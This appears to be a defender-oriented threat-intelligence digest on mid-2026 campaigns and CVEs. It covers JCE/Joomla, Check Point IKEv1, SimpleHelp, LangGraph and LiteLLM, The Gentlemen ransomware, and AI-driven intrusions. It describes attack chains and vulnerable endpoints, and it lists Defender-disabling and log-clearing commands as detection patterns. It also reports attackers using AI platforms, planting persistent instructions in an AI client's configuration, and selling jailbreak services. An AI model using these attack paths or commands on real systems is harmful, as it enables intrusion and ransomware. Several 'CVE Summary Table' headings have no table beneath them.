Rust crypto clipboard-hijacker abusing VirusTotal community reputation (Check Point)

Check Point Research detailed a Rust-based clipboard-hijacker campaign against cryptocurrency users whose distinguishing feature is the systematic manipulation of security-tool reputation signals (Check Point Research, 2026-06-17). The operator runs a network of GitHub ghost accounts, SourceForge pages with inflated download counts, AI-narrated YouTube channels and Telegram channels advertising fake crypto "edge" tools (Solana/Pump.fun sniper bots, Aviator predictors), funnelling victims through a WordPress phishing site to download the Rust payloads for Windows and macOS. Critically, the actor submits fake benign community votes and comments on VirusTotal to lower the apparent threat score, so triage analysts relying on community reputation see the sample as pre-vetted. The payload watches the clipboard for wallet-address patterns and silently substitutes attacker addresses. The operational takeaway for SOC triage: VirusTotal community votes/comments are not a trust signal for this malware class — weight first-party engine verdicts and behaviour, and add clipboard-modification (T1115) hooks plus Rust binaries executing from user Downloads/Temp without code-signing to hunt hypotheses.

CVE-2026-48907 is an improper-access-control flaw (CWE-284) in the JCE extension — one of the most widely installed third-party Joomla editors — that chains three weaknesses in the profile-import workflow: a missing authentication check on index.php?option=com_jce&task=profiles.import, absent file-extension validation, and disabled upload-safety controls (YesWeHack, 2026-06-16). An unauthenticated attacker imports a crafted editor profile that permits .php (or other executable) extensions for the Image Manager / File Browser plugin, then uploads a web shell that lands in images/ by default — yielding OS-level code execution as the web-server user. The vendor states the attacks are fully automated and that a site without a public registration form is not safe; any site that ran a JCE version before 2.9.99.5 should assume compromise and restore from a pre-breach backup after confirming the timeline from web logs (Widget Factory / JCE, 2026-06-03). CISA added it to the KEV catalog on 2026-06-16. Patched in JCE version 2.9.99.5 (2026-06-03), further hardened in 2.9.99.6 (2026-06-06). Detection: unauthenticated POSTs to profiles.import in web logs; unfamiliar auto-named profiles at the top of the JCE profile list with PHP uploads enabled; unexpected PHP files in images/, media/ or tmp/.

CVE Summary Table

Compact view of the actively-exploited / weaponised CVEs across this brief (full context in § 2 above and the § 4 updates).

UPDATE (originally covered 2026-06-09): NCSC-NL updated its advisory (NCSC-2026-0179, version 1.0.1) on 2026-06-16 to note that public proof-of-concept code is now available for the Check Point Security Gateway IKEv1 authentication bypass (CVE-2026-50751, CVSS 9.3), increasing the probability of exploitation (NCSC-NL, 2026-06-16).

The flaw lets an unauthenticated client abuse the IKEv1 negotiation to bypass peer-signature verification and impersonate any VPN identity configured for certificate or mixed authentication (username/password-only configurations are not affected); the public PoC follows watchTowr's earlier technical analysis (Help Net Security, 2026-06-12). Apply the early-June Check Point hotfix; where feasible disable IKEv1 legacy mode or enforce mandatory machine-certificate authentication, which is not bypassable by this flaw.

If you did nothing this week: a Remote Access VPN gateway running the deprecated IKEv1 path is an active ransomware entry point — a Qilin affiliate is using this bypass for initial access.

Check Point disclosed and patched CVE-2026-50751 (CVSS 9.3) on 8 June — a certificate-validation logic flaw in the deprecated IKEv1 key exchange affecting Remote Access VPN and Mobile Access on Security Gateway (Check Point; daily 06-09). The disclosure noted exploitation by a Qilin ransomware affiliate, which puts this firmly in the inaction-equals-incident column: VPN gateways are the front door, and a ransomware crew is already through it on unpatched IKEv1 deployments.

Apply the hotfix and, where operationally possible, disable IKEv1 entirely in favour of IKEv2 — the flaw lives in a protocol path most estates no longer need. Hunt for anomalous VPN session establishment without corresponding successful certificate validation and for new Remote Access sessions from unexpected geographies.

SimpleHelp, a self-hosted remote-support/RMM platform common in European MSP estates, fails to verify the cryptographic signature of OIDC identity tokens presented at login when OIDC authentication is enabled (Horizon3.ai, 2026-06-12). A remote, unauthenticated attacker who submits a forged, unsigned token carrying arbitrary identity claims obtains a fully authenticated Technician session with no user interaction; because signature verification is skipped entirely, any MFA enforced at the identity provider is also bypassed. SimpleHelp patched it in versions 5.5.16 and the 6.0 RC2 prerelease (Security Notice 2026-05); servers running 5.5.15 and earlier are affected (SimpleHelp, 2026-06-12). Horizon3 published detection IOCs for post-exploitation in MSP environments; neither the vendor notice nor the Horizon3 disclosure states a CVSS score at the time of writing. Maps to T1190 (Exploit Public-Facing Application) and T1078.004 (Valid Accounts). Technician access to an RMM server is a stepping stone into every downstream client estate, which is why MSP-tooling auth bypasses are a recurring initial-access vector. Detection: review SimpleHelp access logs for successful Technician authentications preceded by malformed/no-signature OIDC token exchanges and for new Technician sessions from unfamiliar source ranges. Hardening: patch immediately; until then disable OIDC and require SAML or local auth with MFA, and network-restrict the web interface.

CVE Summary Table

(CVE-2026-35273 carried as § 4 UPDATE; included here for the gate-clearing exploitation picture. CVEs that did not clear a § 2 inclusion gate — GitLab CVE-2026-6552 and the Check Point LangGraph chain — are noted in § 3 / § 7.)

Check Point Research disclosed a vulnerability chain in LangGraph, the open-source stateful-agent framework published under LangChain (Check Point Research, 2026-06-11). CVE-2025-67644 is a SQL injection in the SQLite checkpointer's get_state_history() function, which interpolates user-controlled metadata filter keys directly into SQL without sanitisation. Chained with CVE-2026-28277, an unsafe msgpack deserialization in checkpoint loading, an attacker injects a crafted checkpoint row via the SQLi and triggers arbitrary Python module import and command execution when the application later loads that checkpoint — full server-side RCE (The Hacker News, 2026-06-12). A parallel SQLi in the Redis checkpointer is tracked as CVE-2026-27022. Exploitation requires a self-hosted deployment using the SQLite or Redis checkpointer that exposes get_state_history() to user-controlled filter input; PostgreSQL-backed deployments and LangChain's managed LangSmith cloud are not affected. Per Check Point, the fixes shipped in langgraph-checkpoint-sqlite 3.0.1 (CVE-2025-67644), langgraph 1.0.10 (CVE-2026-28277) and langgraph-checkpoint-redis 1.0.2 (CVE-2026-27022). Maps to T1190 and T1059.006. This is the substantive technical disclosure behind the agentic-AI attack surface that Swiss/EU public-sector AI pilots are increasingly building on. Defender action: pin the fixed versions, treat get_state_history() filter input as untrusted even in internal tooling, and never expose the state-history API unauthenticated.

The Gentlemen — tracked by Microsoft as Storm-2697 and by PRODAFT as Phantom Mantis / LARVA-368 — has claimed 478 victims on its leak site, with victims concentrated in Thailand, the UK, Brazil, Germany and India (The Hacker News, 2026-06-11). Microsoft's technical dissection details a Go encryptor obfuscated with Garble: per-file ephemeral Curve25519 key pairs with XChaCha20 (the ephemeral public key is appended to each encrypted file after an --eph-- marker), a --spread argument that "turns the malware from a single-host encryptor into a self-propagating worm" — simultaneously abusing network shares, scheduled tasks and remote process execution (T1021.002, T1053.005) — and a --full mode that spawns a SYSTEM-context child via a scheduled task named gentlemen_system (Microsoft Threat Intelligence, 2026-05-28). Defence evasion includes disabling Defender real-time monitoring (T1562.001), re-enabling SMBv1 and registry changes for anonymous share access; persistence runs via UpdateSystem/UpdateUser scheduled tasks and Run keys. On 10 June, KrebsOnSecurity published a deanonymisation tracing the operator handle "Hastalamuerte"/"Zeta88" to a named Russian national in Izhevsk, corroborated by Intel 471, Constella and Flashpoint (KrebsOnSecurity, 2026-06-10). Check Point Research documents the affiliate-favourable 90/10 revenue split and reports affiliates obtaining initial access via Fortinet SSL-VPN credentials (Check Point Research, 2026-05-13). Note: Krebs cites 332 published victims since mid-2025 versus the leak site's 478 claim — see § 7.

Why it matters to us: the initial-access pattern is concrete and huntable — review Fortinet SSL-VPN authentication logs for brute-force sequences followed by a first-time successful logon from a new ASN; alert on scheduled-task creation named gentlemen_system/UpdateSystem/UpdateUser (Windows Event ID 4698) and on shadow-copy deletion; treat SMBv1 re-enablement on any host as a high-confidence compromise signal.

Check Point Research details a malware-distribution operation that impersonates open-source reversing tools using CloudFront-hosted JavaScript to hijack download clicks and route victims through a Traffic Distribution System enforcing geo/device/VPN/frequency filtering before delivering one of three payloads (Check Point Research, 2026-06-03). The payloads are SessionGate (a per-session multi-stage loader with AES-encrypted modules), RemusStealer (targeting 20+ browsers, 220+ wallet extensions, 77 password-manager extensions and 18 2FA tools), and AnimateClipper (a clipboard hijacker with on-chain C2). The targeting is notable for this audience: it goes after security researchers and developers searching for trusted tools, bypassing standard phishing-awareness training (T1566, T1204, T1555, T1111). Hunt for ghidra/dnspy/ilspy download-then-execute chains under browser child processes and clipboard-API access from unexpected processes. [SINGLE-SOURCE] (Check Point primary research).

Check Point disclosed and patched CVE-2026-50751 (CVSS 9.3) on 8 June 2026 — a logic-flow weakness in certificate validation in the deprecated IKEv1 key exchange affecting Remote Access VPN and Mobile Access deployments. An unauthenticated remote attacker can establish a VPN session without a valid user password; post-authentication activity is still required to reach internal resources (Check Point, 2026-06-08). NCSC-CH issued an Action-Required advisory the same day and links observed exploitation to a Qilin ransomware affiliate (NCSC-CH, 2026-06-08); CISA added the CVE to its KEV catalog on 8 June. Full technical treatment, exploitation prerequisites and hardening are in § 5 below. The companion CVE-2026-50752 (CVSS 7.4, site-to-site IKEv1 MitM, no observed exploitation) should be patched in the same window.

CISA added CVE-2026-42271 to its KEV catalog on 8 June 2026, confirming active exploitation of a command-injection flaw in LiteLLM, the open-source AI gateway/proxy widely deployed to multiplex LLM API calls in enterprise AI stacks (GitHub Advisory GHSA-v4p8-mg3p-g94g). Two preview endpoints — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accept a full MCP server configuration (command, args, env) in the request body; with stdio transport, the proxy spawns the supplied command on the host under the proxy's privileges. The endpoints were gated only by a valid API key with no role check, so any authenticated user (including low-privilege internal keys) could execute arbitrary commands. Horizon3.ai documents that chaining with CVE-2026-48710 (a Starlette Host-header validation bypass) makes the path unauthenticated (Horizon3.ai, 2026-06-01). Affected: LiteLLM 1.74.2 to < 1.83.7; fixed in 1.83.7, which adds role-based authorization on the MCP test endpoints.

CVE Summary Table

UPDATE (originally covered 2026-05-20; consolidated in weekly W21): Microsoft Threat Intelligence published a full dissection of The Gentlemen ransomware on 2026-05-28, giving Storm-2697 a much sharper technical profile than the victim-list reporting available in week 21. The encryptor is a single-binary Go executable (obfuscated through Garble to strip symbol tables), uses Curve25519 + XChaCha20 with per-file ephemeral keys (no bulk-decryption shortcut), and ships a self-propagation module that executes a series of lateral-movement techniques in parallel per host — PsExec, WMIC, scheduled tasks, services, PowerShell remoting — maximising the probability that at least one pivot path succeeds in any AD-joined environment.

Check Point Research's 2026-05-13 writeup adds the actor-side context that Microsoft's dissection does not — Check Point counts approximately 332 victim organisations on the operator's leak site, and documents that on Domain Admin compromise The Gentlemen deploys itself across the estate through a Group Policy Object linked at all relevant OUs. Huntress Labs' 2026-05-21 IR report corroborates the defense-evasion playbook: PowerShell disables Microsoft Defender real-time monitoring (Set-MpPreference -DisableRealtimeMonitoring), stops WinDefend, adds broad Add-MpPreference -ExclusionProcess and drive-level exclusions, disables Controlled Folder Access, and clears Security / System / Application event logs (EID 104, EID 1102). Huntress documented two April / May 2026 incidents whose entry vector was RDP with compromised credentials, lateral movement reached domain controllers via the NETLOGON share and SCCM's CcmExec.exe, and process names were masqueraded as svchost32.exe. The DFIR Report's 2026-05-11 alert confirmed a related chain in which EtherRAT (delivered via a malicious Sysinternals MSI) and TukTuk C2 preceded Gentleman deployment. Microsoft's Defender detection name is Ransom:Win64/Gentlemen.A; recommended Attack Surface Reduction posture per Microsoft's ASR rules reference is Block process creations originating from PsExec and WMI commands combined with EDR-in-block-mode enforcement.

Material new development vs. last coverage: full encryption + propagation mechanism, named-cluster identity (Storm-2697), the GPO-spread pathway documented by Check Point Research, and Check Point's count of approximately 332 victims. Detection focus: hunt for wevtutil cl Security|System|Application chained with sc stop WinDefend or msconfig; flag svchost32.exe spawned outside %SystemRoot%\System32; alert on CcmExec.exe launching non-SCCM payloads. Hardening: enforce SMB signing GPO, restrict GPO-creation rights to a hardened OU, enable Credential Guard, monitor Event ID 5136 for GPO modifications and 5140 for the hidden share SMB share.

UPDATE (originally covered 2026-05-23): Following Unit 42's coverage of UNC1549 / Screening Serpens AppDomainManager hijacking, Check Point Research (published 2026-05-22, widely re-reported this week) adds material technical depth on three February–April 2026 campaign waves keyed to Operation Epic Fury (Check Point Research, 2026-05-22; The Hacker News, 2026-05-26). The IRGC-affiliated actor replaced its MiniJunk family with a new backdoor, MiniFast — a 64-bit DLL with a single CheckForUpdates export and a JSON HTTP C2 using API-style endpoints (/agent/init, /agent/poll, /upload/) and a 14-opcode command set including DLL injection, UAC elevation and scheduled-task persistence.

Two persistence/delivery techniques are new versus the prior coverage: (1) Zoom scheduled-task hijacking (T1053.005) — instead of creating a suspicious new task, the malware watches for the legitimate ZoomUpdateTaskUser-<SID> task and hijacks it; (2) SEO poisoning (T1598.003) via a fake SQL Developer download domain ranked on Bing/DuckDuckGo, alongside T1574.008 AppDomain hijacking via redirected .config files. The loader chain validates parent=svchost.exe before proceeding and abused two SSL.com-issued code-signing certificates (Check Point Research, 2026-05-22). Hunt for ZoomUpdateTaskUser-* task modifications by non-Zoom processes, non-default AppDomainManager values in .NET .config files, and execution from user-writable AppData paths.

Horizon research surfaced a quarterly report the dailies did not cover: Check Point's Q1 2026 State of Ransomware (published 2026-05-11). The synthesis that matters for a CH/EU public-sector SOC is structural, not the leaderboard: after two years of fragmentation driven by law-enforcement pressure on LockBit, ALPHV/BlackCat and others, the ecosystem is reconsolidating — the top ten leak-site operations now account for roughly 71% of listed victims, with Qilin holding the top spot for a third straight quarter and The Gentlemen (§ 7) entering the top three. The single most defender-relevant finding is LockBit's comeback paired with a deliberate geographic shift toward European and Latin American targets — which moves the rebuilt operation directly into this audience's threat model rather than leaving it a US-centric concern. Read alongside the Gentlemen internal-leak intelligence in § 7, the picture is a smaller number of higher-capability operations with European intent; prioritise the edge-appliance and identity hardening those operators are documented to rely on.

The most consequential campaign development of the window is one no daily captured: on 2026-05-04 a rival actor leaked The Gentlemen's internal Rocket database backend on underground forums, and KELA (2026-05-20) and Check Point ("Thus Spoke The Gentlemen", 2026-05-13) published deep analyses of the resulting six-month (Nov 2025 – Apr 2026) chat archive (key: item:the-gentlemen-raas-czech-university-and-swiss-engineering-fi). The leak exposes the inner circle (admin/infrastructure alias zeta88, also operating as hastalamuerte, alongside Wick, mAst3r, Kunder and others) and — far more useful to defenders — the operation's initial-access playbook: Fortinet and Cisco edge appliances, NTLM relay, harvested OWA / M365 credential logs, and GPO-based deployment of the encryptor. A linked affiliate runs a SystemBC SOCKS5 botnet of 1,570+ victims. This is an intelligence gift: every named access path maps to an existing hunt — prioritise edge-appliance patch state, NTLM-relay hardening (SMB/LDAP signing, channel binding) and anomalous-GPO-creation monitoring. Per Check Point's Q1 data the group sits at #3 globally (§ 6) — though its victims concentrate in Thailand, Brazil and India (US ~13%), so the European and Swiss listings carried over from W21 run against its centre of gravity, which is precisely what makes a CH/EU hit worth surfacing rather than treating as background.

Check Point Research's March-April 2026 AI Threat Landscape Digest (published 2026-05-22) is the operationally most striking annual / periodic AI report of the past month. The centrepiece — researched by Gambit Security and summarised in the Check Point post — documents a single unidentified operator compromising nine Mexican government agencies between December 2025 and February 2026, covering tax records, civil registry, patient files and electoral infrastructure. The structural innovation: the attacker ran two commercial AI platforms in parallel — one managing live exploitation and issuing >5,000 AI-executed commands, a second processing harvested data and feeding instructions back into the first. Persistence for the AI itself was simple: modifying the AI client's startup configuration file to embed persistent instructions inherited by every subsequent session.

Two further findings have direct EU/CH public-sector implications. First, the EvilTokens platform — a commercial jailbreak-as-a-service tool packaging AI-driven phishing generation, financial-data extraction and similar capabilities as a subscription — represents the same commoditisation curve as Kali365 (§ 1) but for AI-assisted intrusion. Second, CPR explicitly calls out that stolen API keys for Anthropic, OpenAI, Groq and Mistral are now high-value criminal targets, since they grant access to powerful AI services without an account; Swiss federal and cantonal agencies using commercial AI APIs should treat key rotation cadence and source-IP scoping (Conditional Access on the API layer) on par with classic privileged-credential hygiene. Detection vantage: bulk exfiltration events temporally co-located with anomalous API call patterns to commercial AI services from non-standard processes; process trees in which AI client libraries spawn data-collection subprocesses; cloud audit logs showing API key issuance followed immediately by large-volume inference calls from unusual source IPs.

UPDATE (originally covered 2026-05-14 backend database leak analysis): The TheGentlemen RaaS group's leak site listed two new European victims this week: University of Finance and Administration (VSFS, vsfs.cz) in the Czech Republic on 2026-05-19 and Swiss engineering firm DEVO-Tech AG (devo-tech.ch, Ziefen / BL) on 2026-05-18. The DeXpose write-ups are aggregator coverage of the leak-site listings themselves; neither victim has publicly confirmed the breach as of this brief. TTPs, infrastructure, and the Go-based locker remain unchanged from the Check Point Research deep coverage of 2026-05-14 — the new data point is geographic spread continuing into EU higher education and Swiss SMB engineering.

Higher-education and public-sector defenders in the DACH region should confirm offline-backup integrity and revisit SD-WAN / VPN gateway patch posture (the primary initial-access vectors documented for TheGentlemen in prior reporting). Listings are not victim confirmation; both organisations were listed by TheGentlemen and not confirmed by the victims themselves.

Check Point's AI Threat Landscape Digest (published 2026-05-22, covered 2026-05-23) documents a single operator running two AI platforms in parallel to breach nine Mexican government agencies — the most concrete public example yet of AI tooling operationalised for end-to-end intrusion rather than reconnaissance assistance. Single-source (Check Point only); the synthesis relevant to this audience is the trajectory, not the victim count: where the Verizon and Rapid7 reports show AI compressing the exploitation timeline, this shows AI compressing the operator skill floor — fewer skilled humans needed per campaign. Treat as a directional indicator pending independent corroboration.

Check Point's April 2026 monthly threat report (published early May 2026) confirms Qilin / Agenda leading all ransomware operators with 15% of 707 published attacks in April; Germany is the third-most-targeted country globally at 5.0% of victims (US 41.6%); Europe accounts for 27% of ransomware victims globally. Sector targeting in April 2026: Business Services (33.8%), healthcare, manufacturing. The Gentlemen — despite the May 4 backend breach — remained in the top-7 operators with 320+ victims (Check Point Research, 2026-05-08). The synthesis the dailies did not yet absorb: Germany's 5% share of global ransomware victims is materially elevated compared to the 2024–2025 baseline (~2–3%); the Qilin DLS lists 65 German victims total as of 2026-05-16 (Check Point blog, dataset reference). For Swiss defenders: CH-DE cross-border operations (Swiss subsidiaries in DE, German subsidiaries of Swiss parents) inherit the German exposure level; this is the empirical basis for a DACH-region threat-modelling premium on ransomware-readiness exercises.

Following the 2026-05-04 Rocket backend DB leak (attributed to a breach of hosting provider 4VPS), administrator zeta88 / hastalamuerte announced a full communications-infrastructure overhaul — new NAS deployment and new locker upgrades — signalling no intent to cease operations. The operation maintained ~332 victims in H1 2026, ranking second in global RaaS activity per Check Point Research. Check Point documented initial access via CVE-2024-55591 (FortiOS management interface auth bypass, ITW since November 2024) and CVE-2025-32433 (Erlang SSH in Cisco context); post-access chain includes RelayKing-based NTLM relay (CVE-2025-33073), AD enumeration, EDR disablement, and GPO-deployed locker (Check Point Research; Check Point blog; daily 2026-05-14 UPDATE).

Bedrock Safeguard (Canadian security firm) published a working decryptor on 2026-05-14 exploiting Go's failure to zero XChaCha20 / X25519 ephemeral private-key material from goroutine stacks post-use; 35/35 files decrypted in testing. The operator claims to have patched the binary, so the decryptor capability is best-case retrospective; affiliates show no evidence of forking, and the core nine-person structure remains intact per leaked chats (Bedrock Safeguard decryptor). Defender takeaway: for any Gentlemen-impacted Go-binary host, attempt process-memory dump capture for ephemeral key recovery before reimaging; verify FortiOS patch state on CVE-2024-55591 across every Swiss / EU public-sector Fortinet deployment (the FortiOS bug is the documented initial-access primary, and the W19 long-running record already lists this CVE).

W19 long-running record (item:qilin-agenda-raas-die-linke-confirms-q2-2026-german-activity) tracked Qilin's continued German activity. W20 status: Check Point's April 2026 report confirms Qilin leads all RaaS operators at 15% of 707 published attacks in April; Germany's share at 5% of global ransomware victims is the elevated-DACH-exposure data point (Qilin DLS German-victim count cited by W1 horizon research as approximately 65 as of 2026-05-16 — uncorroborated leak-site enumeration that should be treated as a lower bound); Die Linke (German political party) confirmed Qilin compromise in March 2026 (W19 carry-over); no new Swiss-specific victim named in window (Check Point Research).

UPDATE (originally covered 2026-05-10 in the Q1 2026 ransomware quarterly synthesis): Check Point Research published "Thus Spoke…The Gentlemen" on 2026-05-13, a detailed analysis of a 44.4 MB extract from the group's leaked "Rocket" backend database (16.22 GB total) that was posted to the cybercrime forum Breached on 2026-05-04 after the group's infrastructure was compromised by an unidentified actor (Check Point Research, 2026-05-13; BankInfoSecurity, 2026-05-11). The dataset contains 8,200 lines of internal chat-tool traffic across channels INFO / general / TOOLS / PODBOR, shadow files with password hashes, affiliate negotiation transcripts, and configuration artefacts for the ZeroPulse C2 framework.

Nine operator handles are identified — including administrator zeta88 (also hastalamuerte), who both manages the RaaS panel and participates directly in encryption events. Reconstructed attack chain: initial access almost exclusively via unpatched edge devices — FortiGate CVE-2024-55591 (the group's documented mainstay), Cisco appliances, CWMP/TR-069 interfaces — or purchased infostealer credentials; post-access tooling includes NetExec, RelayKing (NTLM relay), CertiHound (AD Certificate Services abuse), TaskHound, PrivHound; EDR-suppression utilities EDRStartupHinder, gfreeze and glinker manipulate ETW callbacks and NTDLL syscall tables; persistence is maintained via Cloudflare Zero Trust tunnels and self-provisioned WireGuard/OpenVPN chains.

Two operationally critical facts: (1) Check Point Research attributes a count of 1,570+ victim entries to a separately-exposed SystemBC C&C server, against 332 victims publicly listed on the group's data-leak site in the first five months of 2026 — significant under-reporting of true scope (Check Point's wider comparison cites 412 cumulative DLS listings); (2) the decryptor has been released as GitHub Bedrock-Safeguard/gentlemen-decryptor, enabling existing victims to recover without payment (decryptor disclosed in BankInfoSecurity's 2026-05-11 reporting). For Swiss / EU SOCs handling an active Gentlemen incident the workflow changes today: attempt decryption before any negotiation. Detection pivots from the leak: alert on EDRStartupHinder, gfreeze, glinker process names (custom binaries, not commodity); monitor for AD Certificate Services reconnaissance (certutil enumeration of CA servers and templates) consistent with CertiHound; correlate with FortiGate CVE-2024-55591 initial-access exploitation patterns that the group continues to weaponise.

W1 horizon research identified an in-window operator gap the daily briefs missed. "The Gentlemen" emerged in August 2025 and per ZeroFox surged to the second- or third-most-active ransomware operation globally in Q1 2026 — 192 attacks that quarter, a approximately 448% QoQ increase, 32% of Q1 2026 victims in Europe (up from 2% in Q4 2025) (ZeroFox Q1 2026 Wrap-Up, 2026-04-17). Check Point Research's DFIR report on the operator confirms the post-compromise tradecraft observed during a single incident-response engagement: Cobalt Strike delivered via RPC from a Domain Controller; Mimikatz for credential harvesting; GPO abuse to inject a scheduled task into Group Policy that propagates the encryptor to all domain-joined systems near-simultaneously (compressing time-to-encryption to minimise IR response window); SystemBC SOCKS5 C2 tunnelling and covert payload staging; encryption using X25519 Diffie–Hellman key exchange per file combined with XChaCha20 stream cipher, per-file ephemeral key pair with a random 32-byte private key (Check Point Research DFIR Report, 2026-04-20 · BleepingComputer — The Gentlemen + SystemBC, 2026-04-20). CPR explicitly states the precise initial-access vector could not be conclusively determined for the engagement it analysed; broader reporting attributes initial access to a FortiOS / FortiProxy attack surface that includes CVE-2024-55591 (authentication bypass, CVSS 9.8 — patched January 2025), with secondary reporting describing an operator database of pre-exploited devices and brute-forced VPN credentials primed for deployment — defenders should treat patch-state-alone as insufficient if the device was unpatched against CVE-2024-55591 at any point during the exposure window.

European victims surfaced in BleepingComputer's SystemBC coverage and in quarterly leak-site aggregation include Oltenia Energy Complex (Romania — described as a significant portion of national electricity supply, December 2025) and The Adaptavist Group; Comparitech's Q1 2026 healthcare roundup attributes 10 healthcare-sector claims to the operator in the quarter; the operator's leak-site footprint and the absence of an "off-limits" sector convention make hospitals, water utilities, and similar critical-infrastructure targets in-scope. The cross-finding with this week's other concerns: GPO-injected scheduled-task propagation defeats backup-isolation defences if the AD environment is in the encryption path; if the operator's initial-access funnel includes unpatched FortiGate devices, that surface intersects directly with the Polish water-OT NIS2 coverage-gap framing (§ 4, § 6) since small municipal CI operators are over-represented in the unpatched-FortiGate population. Defender priorities for 2026-W20: hunt scheduled tasks in SYSVOL pointing to UNC paths or temp directories; profile SystemBC SOCKS5 beacons; add XChaCha20 file-header pattern detection at backup / DLP tier; re-verify FortiGate patch state against CVE-2024-55591 and any later FortiOS / FortiProxy auth-bypass advisories.